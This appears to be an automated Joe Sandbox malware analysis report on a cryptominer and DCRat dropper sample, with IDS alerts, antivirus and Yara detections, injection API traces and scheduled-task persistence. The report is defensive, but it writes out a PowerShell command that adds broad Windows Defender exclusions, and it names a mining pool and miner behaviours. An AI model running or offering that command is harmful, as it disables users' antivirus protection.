Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 6788, ProcessName: powershell.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:26:21.602997+0100	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.12	62403	1.1.1.1	53	UDP

ET MALWARE SilentCryptoMiner Agent Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:26:23.777135+0100	2054247	1	A Network Trojan was detected	104.20.4.235	443	192.168.2.12	49716	TCP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:26:23.792704+0100	2826930	2	Crypto Currency Mining Activity Detected	192.168.2.12	49715	192.248.189.11	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: launcher.exe.bin.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\ylbujkauzmzd.tmp	Avira: detection malicious, Label: HEUR/AGEN.1362795

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\hs.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\ylbujkauzmzd.tmp	ReversingLabs: Detection: 91%
Source: C:\Windows\Temp\ylbujkauzmzd.tmp	ReversingLabs: Detection: 70%
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe	ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: launcher.exe.bin.exe	Virustotal: Detection: 87%			Perma Link
Source: launcher.exe.bin.exe	ReversingLabs: Detection: 97%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Windows\Temp\ylbujkauzmzd.tmp	Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\updater.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Joe Sandbox ML: detected
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ylbujkauzmzd.tmp	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: launcher.exe.bin.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 43.2.updater.exe.7ff695774ea0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.updater.exe.7ff69572fa80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.updater.exe.7ff695750c40.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.updater.exe.7ff695710000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002B.00000002.2633864515.00007FF69572C000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Temp\ylbujkauzmzd.tmp, type: DROPPED

Source: launcher.exe.bin.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Program Files\Google\Chrome\updater.exe

Directory created: C:\Program Files\Google\Libs

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCRatBuild.exe, 00000003.00000000.2383732416.00000000000A3000.00000002.00000001.01000000.00000006.sdmp, DCRatBuild.exe, 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\Users\EtoShinya\source\repos\shika\x64\Stable\launcher.pdb source: launcher.exe.bin.exe, 00000000.00000003.2384395400.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, launcher.exe.bin.exe, 00000000.00000003.2384062498.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000006.00000000.2385077688.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmp, launcher.exe, 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\EtoShinya\source\repos\shika\x64\Stable\launcher.pdb00 source: launcher.exe.bin.exe, 00000000.00000003.2384395400.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, launcher.exe.bin.exe, 00000000.00000003.2384062498.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000006.00000000.2385077688.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmp, launcher.exe, 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\EtoShinya\source\repos\shika\x64\Stable\launche`r.pdb source: launcher.exe.bin.exe, 00000000.00000003.2384062498.0000000000E29000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \launche`r.pdb source: launcher.exe.bin.exe, 00000000.00000003.2384062498.0000000000E29000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0007A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	3_2_0007A69B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0008C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	3_2_0008C220
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0009B348 FindFirstFileExA,	3_2_0009B348
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF166BE3C FindFirstFileExW,	6_2_000001EDF166BE3C
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E09FA8C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,terminate,GetFileInformationByHandleEx,GetLastError,CloseHandle,terminate,GetFileInformationByHandleEx,GetLastError,CloseHandle,terminate,CloseHandle,CloseHandle,terminate,	6_2_00007FF77E09FA8C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F88BE3C FindFirstFileExW,	24_2_000001881F88BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE6BE3C FindFirstFileExW,	28_2_00000264CDE6BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDECBE3C FindFirstFileExW,	28_2_00000264CDECBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC430BE3C FindFirstFileExW,	30_2_000001BEC430BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37FBE3C FindFirstFileExW,	31_2_0000023BF37FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935D53BE3C FindFirstFileExW,	32_2_000001935D53BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55CBE3C FindFirstFileExW,	34_2_000001B1E55CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E5C9BE3C FindFirstFileExW,	34_2_000001B1E5C9BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFABBE3C FindFirstFileExW,	35_2_0000021CAFABBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB77BE3C FindFirstFileExW,	36_2_000001E7BB77BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB7DBE3C FindFirstFileExW,	36_2_000001E7BB7DBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_000002356054BE3C FindFirstFileExW,	37_2_000002356054BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_00000293F7FCBE3C FindFirstFileExW,	38_2_00000293F7FCBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE818BE3C FindFirstFileExW,	39_2_000001ECE818BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C674BE3C FindFirstFileExW,	40_2_00000223C674BE3C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 104.20.4.235:443 -> 192.168.2.12:49716

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.12:62403 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.12:49715 -> 192.248.189.11:443

Source: lsass.exe, 0000001C.00000000.2466198469.00000264CD9B0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3736854258.00000264CD086000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000001C.00000000.2462794962.00000264CD800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3740595436.00000264CD800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3742274879.00000264CD877000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3736854258.00000264CD086000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000001C.00000002.3743715695.00000264CD9A9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2465788409.00000264CD9A9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462794962.00000264CD84A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3736854258.00000264CD086000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000001C.00000000.2466198469.00000264CD9B0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 0000001C.00000000.2466198469.00000264CD9B0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3736854258.00000264CD086000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000001C.00000002.3743715695.00000264CD9A9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2465788409.00000264CD9A9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462794962.00000264CD84A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3736854258.00000264CD086000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000001C.00000000.2462794962.00000264CD800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3740595436.00000264CD800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3742274879.00000264CD877000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3736854258.00000264CD086000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000001C.00000000.2466198469.00000264CD9B0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000001C.00000000.2462794962.00000264CD800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3740595436.00000264CD800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3742274879.00000264CD877000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3736854258.00000264CD086000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000001C.00000000.2466198469.00000264CD9B0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000001C.00000002.3736854258.00000264CD086000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000001C.00000000.2462794962.00000264CD800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3740595436.00000264CD800000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000001C.00000000.2461866703.00000264CD04E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3735755427.00000264CD04E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000015.00000002.2521873775.000002AD164EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000001C.00000000.2462794962.00000264CD800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3743715695.00000264CD9A9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2466198469.00000264CD9B0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3740595436.00000264CD800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2465788409.00000264CD9A9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462794962.00000264CD84A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3742274879.00000264CD877000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3736854258.00000264CD086000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000001C.00000000.2466198469.00000264CD9B0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3734967113.00000264CD013000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2461701963.00000264CD013000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000015.00000002.2494798943.000002AD06481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2461866703.00000264CD04E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3735755427.00000264CD04E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000001C.00000000.2466198469.00000264CD9B0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000015.00000002.2494798943.000002AD06481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000015.00000002.2521873775.000002AD164EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.2521873775.000002AD164EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.2521873775.000002AD164EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000002.2528079149.000002AD1E995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 00000015.00000002.2521873775.000002AD164EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	Jump to dropped file
Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	Jump to dropped file
Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	Jump to dropped file

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Program Files\Google\Chrome\updater.exe	Process information set: 01 00 00 00
Source: C:\Program Files\Google\Chrome\updater.exe	Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 43.2.updater.exe.7ff695774ea0.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 43.2.updater.exe.7ff695774ea0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 43.2.updater.exe.7ff695774ea0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 43.2.updater.exe.7ff69572fa80.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 43.2.updater.exe.7ff69572fa80.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 43.2.updater.exe.7ff69572fa80.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 43.2.updater.exe.7ff695750c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 43.2.updater.exe.7ff695750c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 43.2.updater.exe.7ff695750c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 43.2.updater.exe.7ff695710000.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 43.2.updater.exe.7ff695710000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 43.2.updater.exe.7ff695710000.4.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000002B.00000002.2633864515.00007FF69572C000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\ylbujkauzmzd.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\ylbujkauzmzd.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\Temp\ylbujkauzmzd.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF1662CDC NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	6_2_000001EDF1662CDC
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF1662A7C NtEnumerateValueKey,NtEnumerateValueKey,	6_2_000001EDF1662A7C
Source: C:\Windows\System32\dialer.exe	Code function: 20_2_00007FF62DC310C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	20_2_00007FF62DC310C0
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F882A7C NtEnumerateValueKey,NtEnumerateValueKey,	24_2_000001881F882A7C
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE626F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	28_2_00000264CDE626F0
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE621CC NtQuerySystemInformation,StrCmpNIW,	28_2_00000264CDE621CC
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37F2A7C NtEnumerateValueKey,NtEnumerateValueKey,	31_2_0000023BF37F2A7C
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000235605423F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	37_2_00000235605423F0
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000235605421CC NtQuerySystemInformation,StrCmpNIW,	37_2_00000235605421CC
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_00000293F7FC24DC NtQueryDirectoryFile,GetFileType,StrCpyW,	38_2_00000293F7FC24DC
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C67423F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	40_2_00000223C67423F0
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C67421CC NtQuerySystemInformation,StrCmpNIW,	40_2_00000223C67421CC
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C67426F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	40_2_00000223C67426F0

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00076FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

3_2_00076FAA

Source: C:\Users\user\AppData\Local\Temp\launcher.exe

Code function: 6_2_00007FF77E0885B0 GetCurrentProcess,OpenProcessToken,Concurrency::details::WorkQueue::IsStructuredEmpty,Concurrency::details::WorkQueue::IsStructuredEmpty,CreateProcessAsUserA,GetModuleHandleW,GetProcAddress,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualFreeEx,WaitForSingleObject,VirtualFreeEx,CloseHandle,Sleep,ResumeThread,CloseHandle,CloseHandle,

6_2_00007FF77E0885B0

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\explorere
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\explorer
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\launcherl
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\launcher
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\nuHgOHHpbRMTfXn
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\nuHgOHHpbRMTfX
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\ApplicationFrameHostA
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\ApplicationFrameHost
